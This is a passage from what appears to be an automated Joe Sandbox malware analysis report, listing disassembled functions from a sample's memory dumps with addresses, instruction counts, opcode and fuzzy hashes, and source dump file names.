                                                  • Instruction ID: f1325a00bf67c06a3b3d8d47c875fc78aa92709aaf3ff3b6e3a72e5cb922b334
                                                  • Opcode Fuzzy Hash: 903b80227118c56f2a013973410bbbf0a75856caceacc72e6627b2bbedd7a9a9
                                                  • Instruction Fuzzy Hash: 00D1BF74E002188FDB54DFA9C994B9DBBB2FF89300F2481A9D409AB395EB355E81CF51
                                                  Function 00712068 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 72e5ae8d0020ace972aa8d107b9dfe8156f5d2468dd296cbe17b04c67914b774
                                                  • Instruction ID: d06a31ec64988996361cd73797551759e0bfa27c83877ee8d7ca256db2fc89a3
                                                  • Opcode Fuzzy Hash: 72e5ae8d0020ace972aa8d107b9dfe8156f5d2468dd296cbe17b04c67914b774
                                                  • Instruction Fuzzy Hash: F8D1BF74E002188FDB54DFA5C990B9DBBB2FF89300F2481A9D809AB355EB355D92CF51
                                                  Function 00714050 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de8a792c6ed253d73db1aa913ce71e864288839ef4a73a50ca555e8a4ff013d2
                                                  • Instruction ID: 2fb09072f1df85a3233f2ab309137eb438c3b2f4a738ae7b8e28ece9965da01d
                                                  • Opcode Fuzzy Hash: de8a792c6ed253d73db1aa913ce71e864288839ef4a73a50ca555e8a4ff013d2
                                                  • Instruction Fuzzy Hash: B1D19E74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D809AB355EB355D81CF51
                                                  Function 00710040 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df76c5f94d77c3a6ffa302460a8b0ebcc185d029107b6ce33f65a1f9f3922cb3
                                                  • Instruction ID: 3ab571888638f432e2fcddfaf369e2d761ff270cf15329240ca007dbb66af572
                                                  • Opcode Fuzzy Hash: df76c5f94d77c3a6ffa302460a8b0ebcc185d029107b6ce33f65a1f9f3922cb3
                                                  • Instruction Fuzzy Hash: 2BD1BF74E002188FDB54DFA9C994B9DBBB2FF89300F2481A9D809AB355EB355D81CF51
                                                  Function 00716E40 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7a11befa2ec3e8fc7195123e7c9c54650a39373eb0333f3748d80bd0a27032e
                                                  • Instruction ID: 01b50bcb14ebc9f45f3da0bd1bf2609b66898405c01e397fb98a7cf8384ab592
                                                  • Opcode Fuzzy Hash: c7a11befa2ec3e8fc7195123e7c9c54650a39373eb0333f3748d80bd0a27032e
                                                  • Instruction Fuzzy Hash: 8DD1BF74E002188FDB14DFA9C990B9DBBB2FF89300F2481A9D809AB355EB355D81CF51
                                                  Function 00715748 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40e2ec5e7b6f17009323317e64fc4642726d773593fa29a574f085634f2da84f
                                                  • Instruction ID: d9a0e766fe744736bb45447e1a3ffd4d3fd1bc4a0b63230845461fdd2bb04481
                                                  • Opcode Fuzzy Hash: 40e2ec5e7b6f17009323317e64fc4642726d773593fa29a574f085634f2da84f
                                                  • Instruction Fuzzy Hash: 13D19D74E00218CFDB54DFA9C994B9DBBB2FF89300F2481A9D409AB395EB355981CF51
                                                  Function 00712E30 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a1318b271b099160d293e45a5b6d71064c18967c57f1e21d5833c38904b6051
                                                  • Instruction ID: 2448f8336da497bceb6ba33bf35d8e1a7f940823e20cabe208d6cdddba8128f4
                                                  • Opcode Fuzzy Hash: 9a1318b271b099160d293e45a5b6d71064c18967c57f1e21d5833c38904b6051
                                                  • Instruction Fuzzy Hash: 60D1BF74E002188FDB14DFA5C950B9DBBB2FF89300F2481A9D809AB355EB355E81CF51
                                                  Function 00711738 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56b1581136cf4222aaba904843f12b1212f085ffe9ff96c2cb2581e0a2e46981
                                                  • Instruction ID: d5b99a744b5b555e62722f02269a071afb61ea9a457f5c426c2f25b511754f7a
                                                  • Opcode Fuzzy Hash: 56b1581136cf4222aaba904843f12b1212f085ffe9ff96c2cb2581e0a2e46981
                                                  • Instruction Fuzzy Hash: 03D1BE74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D809AB395EB355D81CF51
                                                  Function 00716510 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b9f0e08155aa4ab0e211b87e1d7acd8d4e7991ea5ea75d575e00bbeff61c5cc
                                                  • Instruction ID: 2c489ac47a47091a68b7e4005335523abc162637da0f6701658c48e11176d67b
                                                  • Opcode Fuzzy Hash: 1b9f0e08155aa4ab0e211b87e1d7acd8d4e7991ea5ea75d575e00bbeff61c5cc
                                                  • Instruction Fuzzy Hash: F9D1BF78E002188FDB54DFA9C950B9DBBB2FF89300F6481A9D409AB395EB355D81CF51
                                                  Function 00714E18 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11b11d5f6efb7217f14b50818c6e89aa28e5a39579ff961d5adad893d3872b7c
                                                  • Instruction ID: 9fbcfad9fa4c927772fca00ae450e9ec1fd70d1b6fdf785b062498009096dee3
                                                  • Opcode Fuzzy Hash: 11b11d5f6efb7217f14b50818c6e89aa28e5a39579ff961d5adad893d3872b7c
                                                  • Instruction Fuzzy Hash: F1D19D74E00218CFDB54DFA9C994B9DBBB2FF89300F2481A9D809AB395EB355981CF51
                                                  Function 00712500 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56f5ba3e19cead680bfcc5f9c174a25b87ca4027148b3c41277e2b8c33e65ad5
                                                  • Instruction ID: da6ce007b44864894c11b450aa061c4f3353fbfa843266abdaceb9af4aa333d7
                                                  • Opcode Fuzzy Hash: 56f5ba3e19cead680bfcc5f9c174a25b87ca4027148b3c41277e2b8c33e65ad5
                                                  • Instruction Fuzzy Hash: CBD19F74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D409AB395EB355D82CF51
                                                  Function 00717C08 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a509919e70e9693084584f3b2e8b9475caeca3d1dfe3503f6ad2d97b549474e
                                                  • Instruction ID: 7dffe5ddaedb5e146f3b5ead3d5fe76e8dad0011cf75b4133723a541f20faec5
                                                  • Opcode Fuzzy Hash: 8a509919e70e9693084584f3b2e8b9475caeca3d1dfe3503f6ad2d97b549474e
                                                  • Instruction Fuzzy Hash: 48D1AE74E002188FDB54DFA5C990B9DBBB2FF89300F2481A9D809AB395EB355D85CF51
                                                  Function 00710E08 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddebe55547c780c181e8e0c11046a8b894e4261c88e9bc73488609e96311ba88
                                                  • Instruction ID: 4ea720a62f1e77ada1eebb4ad3129442e3cda0685d3889fa632229415da1928d
                                                  • Opcode Fuzzy Hash: ddebe55547c780c181e8e0c11046a8b894e4261c88e9bc73488609e96311ba88
                                                  • Instruction Fuzzy Hash: DDD1AE74E002188FDB54DFA5C990B9DBBB2FF89300F6481A9D809AB365EB355D81CF51
                                                  Function 00715BE0 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbde1d7977e6bd1c39d29b7110835c6e21cbb981d07d936b586b5561163a692f
                                                  • Instruction ID: 1abf66cfcabad0a0c68ce4c82d3f1dd023e1c9d02120fe43af672b179c7226d6
                                                  • Opcode Fuzzy Hash: bbde1d7977e6bd1c39d29b7110835c6e21cbb981d07d936b586b5561163a692f
                                                  • Instruction Fuzzy Hash: 5DD1AE74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D809AB355EB355A81CF51
                                                  Function 007144E8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60ed15f4a57bf01d495a185d1c231c890c48bac0926bf921e23aa276c49cef5a
                                                  • Instruction ID: f0cf263f0533b4843eaee786c88139cc89168471204b5f9f0f71b57c4b3e443e
                                                  • Opcode Fuzzy Hash: 60ed15f4a57bf01d495a185d1c231c890c48bac0926bf921e23aa276c49cef5a
                                                  • Instruction Fuzzy Hash: 48D1BF74E002188FDB54DFA5C994B9DBBB2FF89300F2481A9D409AB395EB355D81CF51
                                                  Function 00711BD0 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbd378bacc47bc5a5a10a84b2807cab1925692e39259584c65fc56310bff921d
                                                  • Instruction ID: 36b6aa2cf8efcffde919ad37796f16e37463185933655498adf1ad8136440494
                                                  • Opcode Fuzzy Hash: bbd378bacc47bc5a5a10a84b2807cab1925692e39259584c65fc56310bff921d
                                                  • Instruction Fuzzy Hash: 59D1BE74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D809AB395EB355D81CF51
                                                  Function 007172D8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d8c976c53d2c9011bbe87b6a5616011990e688e0958ad0630ff624284858554
                                                  • Instruction ID: 295d477356a728fbef33076f7514365397e0598b7c0d370178bd397adf6df102
                                                  • Opcode Fuzzy Hash: 0d8c976c53d2c9011bbe87b6a5616011990e688e0958ad0630ff624284858554
                                                  • Instruction Fuzzy Hash: C3D1AF74E002188FDB54DFA9C994B9DBBB2FF89300F2481A9D809AB395EB355D81CF51
                                                  Function 007104D8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction ID: 53e5a610c1c8eca0573ad5239bb24aaf43e51c4066a1cb03483c478ef1bd08ba
                                                  • Opcode Fuzzy Hash: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction Fuzzy Hash: 46D1AF74E002188FDB54DFA9C990B9DBBB2FF89300F5481A9D409AB395EB356D81CF51
                                                  Function 007132C8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b32a34b83a0721665f8007bcec4a239150b8e6c788aae3ae4e12467cf4aa2e2
                                                  • Instruction ID: 0f1b04190a373073daf5b27f3d7a104ea83a271574c5a46348880a7428f25a32
                                                  • Opcode Fuzzy Hash: 6b32a34b83a0721665f8007bcec4a239150b8e6c788aae3ae4e12467cf4aa2e2
                                                  • Instruction Fuzzy Hash: CFD1AF74E002188FDB54DFA9C990B9DBBB2FF89300F6481A9D409AB395EB355E81CF51
                                                  Function 007152B0 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab2e3c80a0f065ccd8ec27f4fff38c2351fff75f70622f3e0f5b502a375ab882
                                                  • Instruction ID: 57ff1a004e49b4d64db5d35ed69dc6722cd36f684f69ab48a815bb8fdf355962
                                                  • Opcode Fuzzy Hash: ab2e3c80a0f065ccd8ec27f4fff38c2351fff75f70622f3e0f5b502a375ab882
                                                  • Instruction Fuzzy Hash: 9ED19D74E00218CFDB54DFA9C990B9DBBB2FF89300F6481A9D809AB395EB355981CF51
                                                  Function 007112A0 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff93ab631ce471653af663a6c873afc3c3935c0435bce531f4a566d3d7b2d179
                                                  • Instruction ID: 4a9034582f1b83e1ea1ec0ff53574a7c334d979d8d55b459fe69f0c0630c90c4
                                                  • Opcode Fuzzy Hash: ff93ab631ce471653af663a6c873afc3c3935c0435bce531f4a566d3d7b2d179
                                                  • Instruction Fuzzy Hash: E3D19E74E002188FDB54DFA5C990B9DBBB2FF89300F6481A9D809AB3A5EB355D81CF51
                                                  Function 007169A8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b479e9478bb1cabdf6625349f45fe6a9b2714c439e18ab8a436ffe30bccd0c53
                                                  • Instruction ID: 60011786b4e94d831d1dd4a1d1972976fba83810eabfb88ddda60ccc597c4497
                                                  • Opcode Fuzzy Hash: b479e9478bb1cabdf6625349f45fe6a9b2714c439e18ab8a436ffe30bccd0c53
                                                  • Instruction Fuzzy Hash: 1ED1AE74E002188FDB14DFA9D990B9DBBB2FF89300F6481A9D809AB395EB355D81CF51
                                                  Function 00712998 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13e78651d68860034da7751c995e29cdae8b971305a830f9ef00e4de982a27ba
                                                  • Instruction ID: 02cca3027517d2efbe4844d924feb2810023d9a11508b5fe4753d95d02c87c27
                                                  • Opcode Fuzzy Hash: 13e78651d68860034da7751c995e29cdae8b971305a830f9ef00e4de982a27ba
                                                  • Instruction Fuzzy Hash: 2DD1B074E002188FDB54DFA9D990B9DBBB2FF89300F2481A9D809AB355EB355D82CF51
                                                  Function 00714980 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 052a199dd36bb49b34eba775e1440e0a050e666351bff5063f86dfbeeb09e6b5
                                                  • Instruction ID: 5c981d8ccec5eee6aa4a78fa42c0e064484b5f82e16484c54dcdee9b7f2d8a56
                                                  • Opcode Fuzzy Hash: 052a199dd36bb49b34eba775e1440e0a050e666351bff5063f86dfbeeb09e6b5
                                                  • Instruction Fuzzy Hash: C7D1AF74E002188FDB54DFA5C994B9DBBB2FF89300F2481A9D809AB355EB355D81CF51
                                                  Function 008D5788 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7afa038677f7e587dd9ee8c7473dd765b32a680cfd0355d9edd41e3693bf0911
                                                  • Instruction ID: f17b2d142a07a99d535ccd8b04daf4fe842a82eca9a0e23a094ac3681c473a1a
                                                  • Opcode Fuzzy Hash: 7afa038677f7e587dd9ee8c7473dd765b32a680cfd0355d9edd41e3693bf0911
                                                  • Instruction Fuzzy Hash: 5DC1AE74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Function 008D4A80 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 477763a32e4280c2001c39fe8b8c54e475f3aea58b4578a44a54e6520e15ba51
                                                  • Instruction ID: 9ff747e28ada7ca783f885fab535d0f2d58ead10ad49287439d9d6deccf1c30a
                                                  • Opcode Fuzzy Hash: 477763a32e4280c2001c39fe8b8c54e475f3aea58b4578a44a54e6520e15ba51
                                                  • Instruction Fuzzy Hash: C8C1AD74E01218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Function 008DD180 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0bb539dcac94eaab9e3c885a927b20cd23da39cd40655f212265e0b8e714f6a7
                                                  • Instruction ID: 93e06deb8244b1d8c49993b57a3d643253d26f68cc0a93c35b6cf226d0e71b2f
                                                  • Opcode Fuzzy Hash: 0bb539dcac94eaab9e3c885a927b20cd23da39cd40655f212265e0b8e714f6a7
                                                  • Instruction Fuzzy Hash: 27C1BF74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD409AB355DB359A81CF50
                                                  Function 008D7198 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fe492dc4687a46d648d2a5fc693a183f5c48cb594baa43a664931b19769491e4
                                                  • Instruction ID: 972f65058f3997ce20ef0870e5c5d89eb06191d374e34099a046fc56909c2f0a
                                                  • Opcode Fuzzy Hash: fe492dc4687a46d648d2a5fc693a183f5c48cb594baa43a664931b19769491e4
                                                  • Instruction Fuzzy Hash: B7C1BF74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD409AB355EB359A81CF51
                                                  Function 008D6490 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3e7fa2e6e04272b3b6ec1c372ffd413e61a071c045971d1ac4bd84e0b7863d75
                                                  • Instruction ID: bf69a506c5b89c047293933138be79e9b27abda2171730f30403549308ad8794
                                                  • Opcode Fuzzy Hash: 3e7fa2e6e04272b3b6ec1c372ffd413e61a071c045971d1ac4bd84e0b7863d75
                                                  • Instruction Fuzzy Hash: EFC1BE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD409AB355EB359A81CF50
                                                  Function 008D8BA8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 297b38e02c8387b969858f6c3a6cdd216dc6550548a1b86bf08fe9efd22378e2
                                                  • Instruction ID: b478304b821b98fbd1c8facfb8821f9f0e6ce18a7689ecd67c65cf97aa310199
                                                  • Opcode Fuzzy Hash: 297b38e02c8387b969858f6c3a6cdd216dc6550548a1b86bf08fe9efd22378e2
                                                  • Instruction Fuzzy Hash: 9CC1AE74E00218CFDB54DFA5C994B9DBBB2FF89300F2485AAD409AB395DB359A81CF50
                                                  Function 008D7EA0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 40c42c88280c591ff81b5a907640d6fa5acb8fa382d34ce8e4e4df72caceb31a
                                                  • Instruction ID: 933643b02c42e5c6e96b721840d5849e408ff6b76e09f646f7d594bbe887aaac
                                                  • Opcode Fuzzy Hash: 40c42c88280c591ff81b5a907640d6fa5acb8fa382d34ce8e4e4df72caceb31a
                                                  • Instruction Fuzzy Hash: 61C1BE74E00218CFDB54DFA5C994B9DBBB2FB89300F2085AAD809AB355DB359A85CF50
                                                  Function 008D98B0 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6c1e52a579f196db57566a2b8c2ccdf3d74766d3a834287890c7ffc839c8b5c6
                                                  • Instruction ID: 99d2cc4ea1cdd4848c90ac2e055eb9fa1364c26ff08f3f30e7c1a82760e9565b
                                                  • Opcode Fuzzy Hash: 6c1e52a579f196db57566a2b8c2ccdf3d74766d3a834287890c7ffc839c8b5c6
                                                  • Instruction Fuzzy Hash: 7AC1AD74E00218CFDB54DFA5C994B9DBBB2FF89300F2085AAD809AB355DB359A81CF50
                                                  Function 008DBBC8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
